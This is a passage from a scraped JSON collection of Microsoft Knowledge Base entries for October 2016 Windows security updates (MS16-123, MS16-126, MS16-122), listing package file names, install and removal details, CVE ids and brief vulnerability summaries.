934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, and then click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-29\" target=\"_self\">Microsoft Knowledge Base Article 3192391</a><br/>See <a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-30\" target=\"_self\">Microsoft Knowledge Base Article 3185330</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 8.1 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3192392-x86.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3185331-x86.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3192392-x64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3185331-x64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-31\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192392\" id=\"kb-link-32\" target=\"_self\">Microsoft Knowledge Base Article 3192392</a><br/>See <a href=\"https://support.microsoft.com/help/3185331\" id=\"kb-link-33\" target=\"_self\">Microsoft Knowledge Base Article 3185331</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2012 and Windows Server 2012 R2 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3192393-x64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3185332-x64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3192392-x64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3185331-x64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-34\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192393\" id=\"kb-link-35\" target=\"_self\">Microsoft Knowledge Base Article 3192393</a><br/>See <a href=\"https://support.microsoft.com/help/3185332\" id=\"kb-link-36\" target=\"_self\">Microsoft Knowledge Base Article 3185332</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows RT 8.1 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">The 3192392 Security Only update is available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-37\" target=\"_self\">Windows Update</a> only.<br/>The 3185331 Monthly Only update is available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-38\" target=\"_self\">Windows Update</a> only.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192393\" id=\"kb-link-39\" target=\"_self\">Microsoft Knowledge Base Article 3192393</a><br/>See <a href=\"https://support.microsoft.com/help/3185332\" id=\"kb-link-40\" target=\"_self\">Microsoft Knowledge Base Article 3185332</a></td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 10 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3192440-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-</span><span class=\"text-base\">KB3192440</span><span class=\"text-base\">-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3192441-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-</span><span class=\"text-base\">KB3192441</span><span class=\"text-base\">-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3194798-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3194798-x64.ms</span><span class=\"text-base\">u</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-41\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192440\" id=\"kb-link-42\" target=\"_self\">Microsoft Knowledge Base Article 3192440</a><br/>See <a href=\"https://support.microsoft.com/help/3192441\" id=\"kb-link-43\" target=\"_self\">Microsoft Knowledge Base Article 3192441</a><br/>See <a href=\"https://support.microsoft.com/help/3194798\" id=\"kb-link-44\" target=\"_self\">Microsoft Knowledge Base Article 3194798</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-45\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-46\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-47\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-48\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "edition": 3, "modified": "2016-10-11T17:27:50", "id": "KB3192892", "href": "https://support.microsoft.com/en-us/help/3192892/", "published": "2016-10-11T00:00:00", "title": "MS16-123: Security update for kernel-mode drivers: October 11, 2016", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:47:18", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-3298 "], "description": "<html><body><p>Resolves a vulnerability in Windows that could allow information disclosure when the Microsoft Internet Messaging API improperly handles objects in memory.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves a vulnerability in Microsoft Windows. An information disclosure vulnerability exists when the Microsoft Internet Messaging API improperly handles objects in memory. An attacker who successfully exploited this vulnerability could test for the presence of files on disk. <br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms16-126\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-126</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><br/><br/><ul class=\"sbody-free_list\"><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-3\" target=\"_self\">Add language packs to Windows</a>.<br/></li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.<br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/help/3193515\" id=\"kb-link-4\" target=\"_self\">3193515</a> MS16-126: Description of the security update for Microsoft Internet Messaging API: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-5\" target=\"_self\">3192391</a> October 2016 security only quality update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-6\" target=\"_self\">3185330</a> October 2016 security monthly quality rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li></ul><h3 class=\"sbody-h3\">Known issues in this security update</h3> <br/><br/>After you install this security update, System Center Operations Manager (SCOM) Management Console crashes in State view.<br/><br/>To resolve this issue for systems running Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows 8.1, or Windows Server 2012 R2, install the following update:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3200006\" id=\"kb-link-7\">3200006 </a> System Center Operations Manager Management Console crashes after you install MS16-118 and MS16-126<br/></div>To resolve this issue for Windows 10 RTM, install the following update:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3199125\" id=\"kb-link-8\">3199125 </a> Cumulative Update for Windows 10 RTM: October 18, 2016<br/></div>To resolve this issue for Windows 10 Version 1511, install the following update:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3200068\" id=\"kb-link-9\">3200068 </a> Cumulative Update for Windows 10 Version 1511: October 18, 2016<br/></div></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><a class=\"bookmark\" id=\"obtaintheupdate\"></a><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see<br/><a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-11\" target=\"_self\">Get security updates automatically</a>.<br/></div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\" http://catalog.update.microsoft.com/v7/site/search.aspx?q=3196067\" id=\"kb-link-12\" target=\"_self\">Microsoft Update Catalog</a> website.<br/></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Method 3: Microsoft Download Center</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">You can obtain the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.<br/><br/>Click the download link in <a href=\"https://technet.microsoft.com/library/security/ms16-126\" id=\"kb-link-13\" target=\"_self\">Microsoft Security Bulletin MS16-126</a> that corresponds to the version of Windows that you are running.<br/></div><br/></span></div></div></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><br/><br/><h4 class=\"sbody-h4\">Windows Vista (all editions) </h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3181707-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3181707-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-14\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under Windows Update, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3181707\" id=\"kb-link-15\" target=\"_self\">Microsoft Knowledge Base Article 3181707</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 (all editions) </h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3181707-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3181707-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-16\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under Windows Update, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3181707\" id=\"kb-link-17\" target=\"_self\">Microsoft Knowledge Base Article 3181707</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 7 (all editions) </h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3192391-x86.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3185330-x86.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3192391-x64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3185330-x64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-18\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the /Uninstall setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then under Windows Update, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-19\" target=\"_self\">Microsoft Knowledge Base Article 3192391</a><br/>See <a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 3185330</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><br/><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 R2 (all editions) </h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3192391-x64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3185330-x64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3192391-ia64.msu<br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3185330-ia64.msu<br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">A system restart is required after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then under Windows Update, click <span class=\"text-base\">View installed updates</span> and select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-22\" target=\"_self\">Microsoft Knowledge Base Article 3192391</a><br/>See <a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-23\" target=\"_self\">Microsoft Knowledge Base Article 3185330</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><br/><br/><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-24\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-25\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-26\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-27\" target=\"_self\">International Support</a><a class=\"bookmark\" id=\"fileinfo\"></a></div></div></span></div></div></div></div></body></html>", "edition": 2, "modified": "2016-10-19T00:03:59", "id": "KB3196067", "href": "https://support.microsoft.com/en-us/help/3196067/", "published": "2016-10-11T00:00:00", "title": "MS16-126: Security update for Microsoft Internet Messaging API: October 11, 2016", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-01T22:37:59", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-0142"], "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if Microsoft Video Control fails to properly handle objects in memory.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if Microsoft Video Control fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. However, an attacker must first convince a user to open either a specially crafted file or a program from either a webpage or an email message. <br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms16-122\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-122</a>.</div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><br/><br/><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, and Windows 8.1 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, or Windows 8.1-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.<br/></li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.<br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/help/3190847\" id=\"kb-link-6\" target=\"_self\">3190847</a> MS16-122: Description of the security update for Microsoft video control: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3192392\" id=\"kb-link-7\" target=\"_self\">3192392</a> October 2016 security only quality update for Windows 8.1, and Windows 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3185331\" id=\"kb-link-8\" target=\"_self\">3185331</a> October 2016 security monthly quality rollup for Windows 8.1, and Windows 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-9\" 